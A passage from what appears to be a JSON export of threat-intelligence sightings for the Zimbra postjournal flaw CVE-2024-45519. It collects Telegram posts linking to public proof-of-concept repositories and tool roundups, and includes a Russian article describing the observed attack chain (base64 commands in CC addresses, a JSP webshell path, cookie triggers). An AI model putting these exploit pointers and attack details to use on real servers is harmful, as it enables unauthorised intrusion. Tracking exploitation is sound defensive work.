\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f iOS Screen Time. \n\n\u041e\u0448\u0438\u0431\u043a\u0443 \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f Screen Time \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438.\n\n5. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Assetnote \u043d\u0430\u0448\u043b\u0438\u00a0\u0430\u043d\u043e\u043c\u0430\u043b\u0438\u044e\u00a0\u0432 \u0432\u0435\u043b\u0438\u043a\u043e\u043c \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u043c \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u0435, \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0446\u0438\u0435\u0439 \u043e\u0442\u0432\u0435\u0442\u0430\u043c\u0438 DNS, \u0435\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0437\u0430\u043d\u0435\u0441\u0435\u043d\u043d\u044b\u0435 \u0432 \u0447\u0435\u0440\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u043b\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u0441\u043b\u043e\u0432\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u043d\u0435\u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043e \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a DNS poisoning.", "creation_timestamp": "2024-10-01T18:40:05.000000Z"}, {"uuid": "5d4b28b4-0f93-432d-8a2c-5dcee9b9c11f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Revolution/24", "content": "\ud83c\udccf  CVE-2024-45519 is a vulnerability in Zimbra Collaboration (ZCS) that allows unauthenticated users to execute commands through the postjournal service. This guide walks you through setting up a lab environment to reproduce the issue and execute the exploit. \ud83c\udccf \n\nhttps://github.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2024-10-05T11:50:39.000000Z"}, {"uuid": "df3efb8a-592f-4195-a3a9-e5a506224365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9184", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-10-01T19:58:18.000000Z"}, {"uuid": "57e94046-d125-45c8-b2c2-e2ec55af951e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1066", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle & Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:00:43.000000Z"}, {"uuid": "ea8f99ad-a9c0-4cc9-bebd-52ba61b02075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/423", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "a00cdefa-ec14-4e45-ad00-a1ad668a5b2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/424", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "65be7875-7e47-4b2b-8d09-a24688bc9b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/474", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}, {"uuid": "6955f848-6990-4afa-9f4f-9d076fcd251a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-10-03T21:10:01.000000Z"}, {"uuid": "bcff61aa-bb2d-478e-a985-979eeaaea317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3lkv3l2oy7u2j", "content": "", "creation_timestamp": "2025-03-21T11:16:17.147727Z"}, {"uuid": "476c6fef-1b5f-4e47-9ff2-a95c47e8bd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/14494", "content": "\u200aZimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-28T10:56:35.000000Z"}, {"uuid": "f571fbe0-d797-472a-b66f-ae5bb347e4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/2598", "content": "Zimbra\n - Remote Command Execution (CVE-2024-45519)\n\ngithub.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2025-03-02T10:34:26.000000Z"}, {"uuid": "3a4f3fcd-111c-4711-9564-763720cedc1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/6424", "content": "\ud83d\udea8CVE-2024-45519 - Zimbra Postjournal Exploit Setup\n\nhttps://darkwebinformer.com/cve-2024-45519-zimbra-postjournal-exploit-setup/", "creation_timestamp": "2024-11-05T22:12:11.000000Z"}, {"uuid": "d14f6fc1-0b15-4c8f-84a8-ac5aa9852d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1012", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:35:52.000000Z"}, {"uuid": "eb44571b-4f63-4a99-b4f3-7610c3ef1858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/CkXBWnwBfBoySBukTmGlFhbCoxZd7mul-lMTkTsWlZiBLw", "content": "", "creation_timestamp": "2024-10-02T09:40:30.000000Z"}, {"uuid": "af2bf742-5769-40e4-8d2e-67bf8df16dff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ZeroEthical_Course/1607", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T12:26:59.000000Z"}, {"uuid": "fd3488df-0cb7-4d62-b67a-90b800becfaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15229", "content": "\u200aZimbra Email Servers Under Attack: CISA Flags CVE-2024-45519 as Actively Exploited\n\nhttps://securityonline.info/zimbra-email-servers-under-attack-cisa-flags-cve-2024-45519-as-actively-exploited/", "creation_timestamp": "2024-10-05T17:00:36.000000Z"}, {"uuid": "6e83d0fe-992d-4129-9efe-0473f016e069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15046", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-03T08:40:35.000000Z"}, {"uuid": "cb2cf514-9299-4cd4-9c74-4817cd7a1e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/15385", "content": "\u200a19.6K+ Public Zimbra Installations Vulnerable to Code Execution Attacks \u2013 CVE-2024-45519\n\nhttps://gbhackers.com/zimbra-installations-code-execution-attack/", "creation_timestamp": "2024-10-08T03:27:20.000000Z"}, {"uuid": "28554b3b-3f51-4eeb-a050-8c75efc91116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/KomunitiSiber/2661", "content": "Researchers Warn of Ongoing Attacks Exploiting Critical Zimbra Postjournal Flaw\nhttps://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in Zimbra's postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T13:28:40.000000Z"}, {"uuid": "581897e9-51fd-4657-91f1-623b35ed08a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/true_secator/6271", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zimbra postjournal, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0442\u0430\u0440\u0442\u043e\u0432\u0430\u043b\u0430 \u0447\u0435\u0440\u0435\u0437 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC.\n\nCVE-2024-45519 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 Zimbra \u0432\u0435\u0440\u0441\u0438\u0439 9.0.0 Patch 41, 10.0.9, 10.1.1 \u0438 8.8.15 Patch 46.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u044f\u043c\u0438, \u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0435\u0449\u0435 \u043d\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 NIST (NVD), \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 ProjectDiscovery \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0ProjectDiscovery, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u00a0\u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0445, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c SMTP-\u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0441\u043b\u0443\u0436\u0431\u0443 Postjournal.\n\n\u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0441\u043b\u0443\u0436\u0431\u0430 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430, \u043d\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0435\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0437 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u0441\u0435\u0442\u0438.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-45519 \u0431\u044b\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u0432\u043e\u0430\u043d\u044b Proofpoint \u0443\u0436\u0435 28 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f, \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a ProjectDiscovery \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u043e\u0439 \u043f\u043e\u0434 Gmail \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438\u0441\u044c \u043d\u0430 \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u0432 \u043f\u043e\u043b\u044f\u0445 CC, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b Zimbra \u0438\u0445 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u0430\u043a \u043a\u043e\u043c\u0430\u043d\u0434\u044b. \u0410\u0434\u0440\u0435\u0441\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0441\u0442\u0440\u043e\u043a\u0438 base64, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b sh.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 CC, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u043d\u0430 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Zimbra \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443: \u00ab/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp\u00bb.\n\n\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0435\u0442 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0437\u0430\u0440\u0430\u043d\u0435\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044f cookie JSESSIONID \u0438, \u0435\u0441\u043b\u0438 \u043e\u043d\u043e \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u043a \u0430\u043d\u0430\u043b\u0438\u0437\u0443 cookie JACTION \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434 Base64.\n\n\u0412\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 \u043e\u0441\u043d\u0430\u0449\u0435\u043d\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 exec. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u044b \u043e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0444\u0430\u0439\u043b \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442\u043d\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c HarfangLab \u0418\u0432\u0430\u043d \u041a\u0432\u044f\u0442\u043a\u043e\u0432\u0441\u043a\u0438 \u0432\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a \u0442\u0430\u043a\u0436\u0435\u00a0\u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0436\u0430\u043b \u043e\u0431 IP, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0438\u0441\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519.\n\nProofpoint \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043a\u0430\u043a \u043f\u0438\u0441\u0435\u043c \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438, \u0442\u0430\u043a \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430, \u043d\u043e \u043f\u043e\u043a\u0430 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0438 \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0441 \u043a\u0430\u043a\u0438\u043c-\u043b\u0438\u0431\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u043e\u043c \u0443\u0433\u0440\u043e\u0437.\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Synacor \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0432\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 postjournal, \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0442\u0447, \u0447\u0442\u043e\u0431\u044b 